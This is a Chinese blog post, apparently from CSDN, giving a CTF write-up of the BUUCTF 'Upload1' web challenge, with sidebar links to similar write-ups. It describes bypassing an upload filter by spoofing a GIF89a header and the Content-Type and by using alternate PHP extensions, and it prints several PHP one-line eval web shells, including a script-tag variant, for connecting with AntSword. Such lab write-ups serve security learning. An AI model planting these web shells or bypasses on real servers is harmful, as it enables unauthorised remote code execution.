[极客大挑战 2019]Upload1

最新推荐文章于 2024-09-17 22:33:50 发布
最新推荐文章于 2024-09-17 22:33:50 发布
阅读量47 收藏 1
点赞数
分类专栏: BUUCTF web题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/133791565
版权

本题目的是熟知一些简单php一句话木马以及一些绕过方式

一眼便是文件上传漏洞

尝试传入一句话木马

GIF89a是文件头信息,可以通过识别文件头信息判断是什么文件

通过将文件头改为GIF89a让系统以为是图片文件(文件头欺骗)

返回not image

现在就需要考虑是否是看了http头文件里的Content-Type:了

content-type:是网页中用于定义网络文件的类型和编码的标头,可以指定浏览器以什么形式、什么编码读取文件

通过修改content-type:为image/jpeg告诉网站是通过图片形式读取文件从而绕过

还是返回not php,看来还是对后缀做了防护

PHTML、PHP3、PHP4、PHP5、PHP7、PHPS

尝试用其他后缀进行绕过,以上文件后缀会被当做php文件执行

用bp抓包fuzz一下

看起来php7和phps可以成功上传,对后缀过滤的不是很严格

回响页面反应文件中<?被发现了

一般的一句话木马有三种形式

<?php eval($_POST['a']);?>            

<?= eval($_POST['a']);?>                在现在的php中<?=等同于<?php echo

<script language="php">eval($_POST['a']);</script>

应为这里封了<?,所以我们使用第三种Php一句话木马

成功上传

先在用蚁剑连接就可以了

或者通过POST传参也行

怪兽不会rap_哥哥我会crash
关注
专栏目录
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 943
文件上传冲啊!!!!!!
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2520
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
BUUFCTF—[极客挑战 2019]Upload 1
内心不种满鲜花就会长满杂草
05-12 1161
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]Upload 1
chbeloved的博客
07-21 719
[极客挑战 2019]Upload 1 上传类题目,先上传一个一句话木马再说。 把文件后缀改成jpg php就用到了<? 那就改用script写 再用jpg上传 这都被看出来了,说明对文件内容检查,那就在文件内加个JPG89a (图片头文件欺骗) 但是不成功… 有点不死心,改成GIF89a 居然过了 说明是绕过了 接下来抓包,把jpg文件修改成phtml文件发挥作用 改第一处黄色标记那后缀phtml。然后点击go 上传成功了,访问试试。 看这结尾,一般都是upload/文件名 看来是
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 885
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 950
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 375
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
2024网络安全人才实战能力白皮书安全测试评估篇
2301_76786857的博客
09-13 841
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 871
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
对称密码中的密钥是如何实现安全配送的?
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-17 528
密钥配送问题是指在对称密码算法中,加密和解密使用同一个密钥,发送方必须设法将密钥安全地发送给接收方,而不会被第三方窃听者截获。如果密钥被窃取,那么加密的数据也会被破解,因此密钥的安全配送成为对称密码算法的一个关键问题。为了解决这个问题,密码学领域发展出了多种策略和解决方案。通过通信双方事先共享密钥密钥来解决通过密钥分配中心(KDC)来解决通过密钥交换Diffie-Hellman(DH)来解决通过公钥密码来解决。
等保测评:企业如何建立安全的开发环境
最新发布
2301_79955948的博客
09-17 758
同时,建立健全的安全管理制度,明确安全责任,进行安全培训,以及实施安全审计和监控.综上所述,企业在构建安全开发环境时,应制定明确的安全策略,建立全面的管理制度,并持续进行安全管理和员工培训,以确保安全策略的有效实施和企业信息资产的安全。:应将主要设备放置在机房内,并进行固定,设置明显的不易除去的标记。通过上述措施,企业可以建立符合等保测评要求的安全开发环境,有效防范信息安全风险,保护企业的核心资产和用户信息。通过综合使用上述工具和方法,企业可以有效地提高代码的安全性,减少安全风险,并确保软件产品的合规性。
GORM安全-保护你的应用免受SQL注入攻击
一起coding,一起嗨。
09-12 675
GORM安全-保护你的应用免受SQL注入攻击
【觅图网-注册安全分析报告-无验证方式导致安全隐患】
09-17 438
觅图网是一个专业的素材网站,提供各种高质量的png透明素材和预判背景,满足设计师和开发者的各种需求。作为专业的素材提供平台,好像对短信被盗刷的安全方面不够重视 ,测试结果就是除了有ip限制, 只要用代理IP, 随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “
【网络安全 | 代码审计】PHP无参数RCE
等风来
09-17 526
一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数。
安全政策与安全意识(下)
记录开发和安全学习过程中的点点滴滴
09-13 719
全面深入地探讨了等级保护(等保)体系,包括其三个不同等级的划分、从等保1.0到2.0的发展历程、以及相应的法律和法规基础。文章强调了等保的必要性,并详细介绍了等保测评流程,如何确定信息系统的等级,以及关键信息系统的划分和定级建议。并且提供了网络安全、主机安全和应用数据安全的详细解读,以及相应的等级保护安全技术方案,为三级等保提出了通用的实施方案,旨在帮助组织构建符合国家标准的网络安全防护措施。
香港电讯SASE解决方案:终端与云端的安全护航
HKT香港电讯的博客
09-14 1128
终端到云端无缝连接,一体化安全防护。
Web 安全基础教程:从零基础入门到精通
2301_77160226的博客
09-14 953
Web 安全是指保护 Web 应用程序免受各种网络威胁,确保 Web 服务的保密性、完整性和可用性。在当今数字化时代,Web 应用广泛存在于各个领域,从电子商务到社交媒体,从企业内部系统到政府公共服务平台。Web 安全旨在防止恶意攻击者利用 Web 应用中的漏洞,窃取敏感信息、篡改数据或破坏服务。2.重要性对于企业而言,Web 安全关系到商业机密、客户信息的保护,一旦遭受攻击,可能面临巨大的经济损失、声誉损害和法律风险。
文件外发怎么保证安全
shunyou0526的博客
09-14 653
为了确保文件在外发过程中的安全
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值